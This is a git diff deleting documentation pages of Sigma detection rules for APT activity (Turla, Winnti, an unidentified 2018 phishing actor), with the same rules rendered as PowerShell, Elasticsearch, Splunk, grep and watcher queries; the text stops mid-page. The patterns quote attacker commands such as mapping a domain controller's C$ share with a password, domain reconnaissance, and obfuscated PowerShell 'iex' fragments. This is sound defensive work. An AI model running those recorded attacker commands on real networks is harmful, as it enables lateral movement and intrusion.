-author: Markus Neis
-date: 2017/11/07
-logsource:
-    category: process_creation
-    product: windows
-falsepositives:
-   - Unknown
----
-detection:
-   selection:
-      CommandLine:
-         - 'net use \\%DomainController%\C$ "P@ssw0rd" *'
-         - 'dir c:\\*.doc* /s'
-         - 'dir %TEMP%\\*.exe'
-   condition: selection
-level: critical
----
-detection:
-   netCommand1:
-      CommandLine: 'net view /DOMAIN'
-   netCommand2:
-      CommandLine: 'net session'
-   netCommand3:
-      CommandLine: 'net share'
-   timeframe: 1m
-   condition: netCommand1 | near netCommand2 and netCommand3
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_apt_turla_commands.yml): Only COUNT aggregation function is implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_apt_turla_commands.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c601f20d-570a-4cde-a7d6-e17f99cb8e7f <<EOF
-{
-  "metadata": {
-    "title": "Turla Group Lateral Movement",
-    "description": "Detects automated lateral movement by Turla group",
-    "tags": [
-      "attack.g0010",
-      "attack.execution",
-      "attack.t1059",
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.discovery",
-      "attack.t1083",
-      "attack.t1135"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(net\\ use\\ \\\\%DomainController%\\\\C$\\ \\\"P@ssw0rd\\\"\\ * OR dir\\ c\\:\\\\*.doc*\\ \\/s OR dir\\ %TEMP%\\\\*.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(net\\ use\\ \\\\%DomainController%\\\\C$\\ \\\"P@ssw0rd\\\"\\ * OR dir\\ c\\:\\\\*.doc*\\ \\/s OR dir\\ %TEMP%\\\\*.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla Group Lateral Movement'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c601f20d-570a-4cde-a7d6-e17f99cb8e7f-2 <<EOF
-{
-  "metadata": {
-    "title": "Turla Group Lateral Movement",
-    "description": "Detects automated lateral movement by Turla group",
-    "tags": [
-      "attack.g0010",
-      "attack.execution",
-      "attack.t1059",
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.discovery",
-      "attack.t1083",
-      "attack.t1135"
-    ],
-    "query": "winlog.event_data.CommandLine:\"net\\ view\\ \\/DOMAIN\""
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "1m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:\"net\\ view\\ \\/DOMAIN\"",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla Group Lateral Movement'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_apt_turla_commands.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_apt_turla_commands.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_apt_turla_commands.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*net use \\%DomainController%\C\$ "P@ssw0rd" .*|.*dir c:\\.*\.doc.* /s|.*dir %TEMP%\\.*\.exe)'
-grep -P '^net view /DOMAIN'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_comrat_may20.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_comrat_may20.md
deleted file mode 100644
index 9aa95a4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_comrat_may20.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Turla Group Commands May 2020       |
-|:-------------------------|:------------------|
-| **Description**          | Detects commands used by Turla group as reported by ESET in May 2020 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li><li>[T1016: System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li><li>[T1016: System Network Configuration Discovery](../Triggers/T1016.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf](https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0010</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Turla Group Commands May 2020
-id: 9e2e51c5-c699-4794-ba5a-29f5da40ac0c
-status: experimental
-description: Detects commands used by Turla group as reported by ESET in May 2020
-references:
-    - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
-tags:
-    - attack.g0010
-    - attack.execution
-    - attack.t1086
-    - attack.t1053
-    - attack.t1027
-    - attack.discovery
-    - attack.t1016
-    - attack.t1059.001
-author: Florian Roth
-date: 2020/05/26
-logsource:
-    category: process_creation
-    product: windows
-falsepositives:
-    - Unknown
-detection:
-    selection1:
-        CommandLine|contains:
-            - 'tracert -h 10 yahoo.com'
-            - '.WSqmCons))|iex;'
-            - 'Fr`omBa`se6`4Str`ing'
-    selection2:
-        CommandLine|contains|all:
-            - 'net use https://docs.live.net'
-            - '@aol.co.uk'
-    condition: 1 of them
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*tracert -h 10 yahoo.com.*" -or $_.message -match "CommandLine.*.*.WSqmCons))|iex;.*" -or $_.message -match "CommandLine.*.*Fr`omBa`se6`4Str`ing.*") -or ($_.message -match "CommandLine.*.*net use https://docs.live.net.*" -and $_.message -match "CommandLine.*.*@aol.co.uk.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*tracert\ \-h\ 10\ yahoo.com* OR *.WSqmCons\)\)|iex;* OR *Fr`omBa`se6`4Str`ing*) OR (winlog.event_data.CommandLine.keyword:*net\ use\ https\:\/\/docs.live.net* AND winlog.event_data.CommandLine.keyword:*@aol.co.uk*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/9e2e51c5-c699-4794-ba5a-29f5da40ac0c <<EOF
-{
-  "metadata": {
-    "title": "Turla Group Commands May 2020",
-    "description": "Detects commands used by Turla group as reported by ESET in May 2020",
-    "tags": [
-      "attack.g0010",
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1053",
-      "attack.t1027",
-      "attack.discovery",
-      "attack.t1016",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*tracert\\ \\-h\\ 10\\ yahoo.com* OR *.WSqmCons\\)\\)|iex;* OR *Fr`omBa`se6`4Str`ing*) OR (winlog.event_data.CommandLine.keyword:*net\\ use\\ https\\:\\/\\/docs.live.net* AND winlog.event_data.CommandLine.keyword:*@aol.co.uk*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*tracert\\ \\-h\\ 10\\ yahoo.com* OR *.WSqmCons\\)\\)|iex;* OR *Fr`omBa`se6`4Str`ing*) OR (winlog.event_data.CommandLine.keyword:*net\\ use\\ https\\:\\/\\/docs.live.net* AND winlog.event_data.CommandLine.keyword:*@aol.co.uk*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla Group Commands May 2020'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*tracert \-h 10 yahoo.com* *.WSqmCons\)\)|iex;* *Fr`omBa`se6`4Str`ing*) OR (CommandLine.keyword:*net use https\:\/\/docs.live.net* AND CommandLine.keyword:*@aol.co.uk*))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*tracert -h 10 yahoo.com*" OR CommandLine="*.WSqmCons))|iex;*" OR CommandLine="*Fr`omBa`se6`4Str`ing*") OR (CommandLine="*net use https://docs.live.net*" CommandLine="*@aol.co.uk*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine IN ["*tracert -h 10 yahoo.com*", "*.WSqmCons))|iex;*", "*Fr`omBa`se6`4Str`ing*"] OR (CommandLine="*net use https://docs.live.net*" CommandLine="*@aol.co.uk*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*tracert -h 10 yahoo\.com.*|.*.*\.WSqmCons\)\)\|iex;.*|.*.*Fr`omBa`se6`4Str`ing.*)|.*(?:.*(?=.*.*net use https://docs\.live\.net.*)(?=.*.*@aol\.co\.uk.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_service_png.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_service_png.md
deleted file mode 100644
index d2026ff..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_turla_service_png.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Turla PNG Dropper Service       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unlikely</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0010</li><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Turla PNG Dropper Service
-id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
-description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
-references:
-    - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
-author: Florian Roth
-date: 2018/11/23
-tags:
-    - attack.persistence
-    - attack.g0010
-    - attack.t1050
-    - attack.t1543.003
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
-        ServiceName: 'WerFaultSvc'
-    condition: selection
-falsepositives:
-    - unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and $_.message -match "ServiceName.*WerFaultSvc") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND winlog.event_data.ServiceName:"WerFaultSvc")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1228f8e2-7e79-4dea-b0ad-c91f1d5016c1 <<EOF
-{
-  "metadata": {
-    "title": "Turla PNG Dropper Service",
-    "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018",
-    "tags": [
-      "attack.persistence",
-      "attack.g0010",
-      "attack.t1050",
-      "attack.t1543.003"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"WerFaultSvc\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:\"WerFaultSvc\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla PNG Dropper Service'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ServiceName:"WerFaultSvc")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" ServiceName="WerFaultSvc")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" service="WerFaultSvc")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*WerFaultSvc))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_unidentified_nov_18.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_unidentified_nov_18.md
deleted file mode 100644
index 64363cc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_unidentified_nov_18.md
+++ /dev/null
@@ -1,265 +0,0 @@
-| Title                    | Unidentified Attacker November 2018       |
-|:-------------------------|:------------------|
-| **Description**          | A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1085: Rundll32](https://attack.mitre.org/techniques/T1085)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      |  There are no documented False Positives for this Detection Rule yet  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://twitter.com/DrunkBinary/status/1063075530180886529](https://twitter.com/DrunkBinary/status/1063075530180886529)</li></ul>  |
-| **Author**               | @41thexplorer, Microsoft Defender ATP |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Unidentified Attacker November 2018
-id: 7453575c-a747-40b9-839b-125a0aae324b
-status: stable
-description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with
-    YYTRIUM/APT29 campaign in 2016.
-references:
-    - https://twitter.com/DrunkBinary/status/1063075530180886529
-author: '@41thexplorer, Microsoft Defender ATP'
-date: 2018/11/20
-modified: 2018/12/11
-tags:
-    - attack.execution
-    - attack.t1085
-detection:
-    condition: 1 of them
-level: high
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: '*cyzfc.dat, PointFunctionCall'
----
-# Sysmon: File Creation (ID 11)
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection2:
-        EventID: 11
-        TargetFilename: 
-            - '*ds7002.lnk*' 
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*cyzfc.dat, PointFunctionCall") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "11" -and ($_.message -match "TargetFilename.*.*ds7002.lnk.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:*cyzfc.dat,\ PointFunctionCall
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"11" AND winlog.event_data.TargetFilename.keyword:(*ds7002.lnk*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7453575c-a747-40b9-839b-125a0aae324b <<EOF
-{
-  "metadata": {
-    "title": "Unidentified Attacker November 2018",
-    "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.",
-    "tags": [
-      "attack.execution",
-      "attack.t1085"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:*cyzfc.dat,\\ PointFunctionCall"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:*cyzfc.dat,\\ PointFunctionCall",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Unidentified Attacker November 2018'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/7453575c-a747-40b9-839b-125a0aae324b-2 <<EOF
-{
-  "metadata": {
-    "title": "Unidentified Attacker November 2018",
-    "description": "A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016.",
-    "tags": [
-      "attack.execution",
-      "attack.t1085"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*ds7002.lnk*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"11\" AND winlog.event_data.TargetFilename.keyword:(*ds7002.lnk*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Unidentified Attacker November 2018'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:*cyzfc.dat, PointFunctionCall
-(EventID:"11" AND TargetFilename.keyword:(*ds7002.lnk*))
-```
-
-
-### splunk
-    
-```
-CommandLine="*cyzfc.dat, PointFunctionCall"
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="11" (TargetFilename="*ds7002.lnk*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*cyzfc.dat, PointFunctionCall")
-(event_id="11" TargetFilename IN ["*ds7002.lnk*"])
-```
-
-
-### grep
-    
-```
-grep -P '^.*cyzfc\.dat, PointFunctionCall'
-grep -P '^(?:.*(?=.*11)(?=.*(?:.*.*ds7002\.lnk.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_winnti_mal_hk_jan20.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_winnti_mal_hk_jan20.md
deleted file mode 100644
index c6efa37..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_winnti_mal_hk_jan20.md
+++ /dev/null
@@ -1,190 +0,0 @@
-| Title                    | Winnti Malware HK University Campaign       |
-|:-------------------------|:------------------|
-| **Description**          | Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/](https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/)</li></ul>  |
-| **Author**               | Florian Roth, Markus Neis |
-| Other Tags           | <ul><li>attack.g0044</li><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Winnti Malware HK University Campaign
-id: 3121461b-5aa0-4a41-b910-66d25524edbb
-status: experimental
-description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
-references:
-    - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.g0044
-    - attack.t1574.002
-author: Florian Roth, Markus Neis
-date: 2020/02/01
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        ParentImage|contains:
-            - 'C:\Windows\Temp'
-            - '\hpqhvind.exe'
-        Image|startswith: 'C:\ProgramData\DRM'
-    selection2:
-        ParentImage|startswith: 'C:\ProgramData\DRM'
-        Image|endswith: '\wmplayer.exe'
-    selection3:
-        ParentImage|endswith: '\Test.exe'
-        Image|endswith: '\wmplayer.exe'
-    selection4:
-        Image: 'C:\ProgramData\DRM\CLR\CLR.exe'
-    selection5:
-        ParentImage|startswith: 'C:\ProgramData\DRM\Windows'
-        Image|endswith: '\SearchFilterHost.exe'
-    condition: 1 of them
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ((($_.message -match "ParentImage.*.*C:\\Windows\\Temp.*" -or $_.message -match "ParentImage.*.*\\hpqhvind.exe.*") -and $_.message -match "Image.*C:\\ProgramData\\DRM.*") -or ($_.message -match "ParentImage.*C:\\ProgramData\\DRM.*" -and $_.message -match "Image.*.*\\wmplayer.exe") -or ($_.message -match "ParentImage.*.*\\Test.exe" -and $_.message -match "Image.*.*\\wmplayer.exe") -or $_.message -match "Image.*C:\\ProgramData\\DRM\\CLR\\CLR.exe" -or ($_.message -match "ParentImage.*C:\\ProgramData\\DRM\\Windows.*" -and $_.message -match "Image.*.*\\SearchFilterHost.exe"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.ParentImage.keyword:(*C\:\\Windows\\Temp* OR *\\hpqhvind.exe*) AND winlog.event_data.Image.keyword:C\:\\ProgramData\\DRM*) OR (winlog.event_data.ParentImage.keyword:C\:\\ProgramData\\DRM* AND winlog.event_data.Image.keyword:*\\wmplayer.exe) OR (winlog.event_data.ParentImage.keyword:*\\Test.exe AND winlog.event_data.Image.keyword:*\\wmplayer.exe) OR winlog.event_data.Image:"C\:\\ProgramData\\DRM\\CLR\\CLR.exe" OR (winlog.event_data.ParentImage.keyword:C\:\\ProgramData\\DRM\\Windows* AND winlog.event_data.Image.keyword:*\\SearchFilterHost.exe))
-```
-
-
-### xpack-watcher
-    
-```
